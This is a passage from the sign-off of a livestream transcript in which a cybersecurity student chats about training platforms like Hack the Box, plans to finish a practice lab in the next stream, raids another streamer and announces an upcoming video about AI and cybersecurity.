properly. Center myself here. But yeah, that's going to be it for me, guys. Thanks for tuning in. I appreciate it, as always. Before we go, Defus says, I did half the 80 try hacking path and then went to Vuln Lab, did all the easy media boxes, and then after that, I felt like a very solid understanding of 80 basics. But Vuln Lab is now merged into Hack the Box. Yeah, I wish that Vuln Lab didn't do that personally, but hey, whatever. Get in the bag. I understand. But yeah, that's gonna be it for the stream. Whenever we stream next, like I said, we're going to be building out the configuration, making sure the delegation token works as expected. And then after we get that working, I think we will be done with the box. I think that's the last thing we need to do. That and PowerShell history. So tomorrow may be one of the last streams of this series, which is not tomorrow. I keep saying tomorrow. The next stream may be one of the last streams of the series with the configuration. We're up to part 6 at this point, so I mean, hopefully it's one of the last ones. This is getting a little too long for my personal liking, but yeah, that's it for me. We're going to raid Pebble because Defus, your raid suggestion yesterday was so good. So let me bring up Twitch and raid Pebble. Okay. It's a good name. I like that name. Let's see, what box are we doing here? Ooh, Dark Zero. Oh my gosh, that machine was so hard, but I enjoyed it. I enjoyed it frequently. Anywho, that's it for me. I'm gonna stop stalling. Thank you guys for watching. New video later today. I'm actually gonna go record it right now. It's not gonna be a normal video. It's gonna be very like raw thoughts about AI and cybersecurity, and as a student, my perspective on all that. So it's not gonna be polished. It's not gonna be edited. It's gonna be very raw. Very like not something that I usually do. So stay tuned for later today on my channel when I throw that up. But yeah, that's it for me. Thank you for watching. I'll see you next week.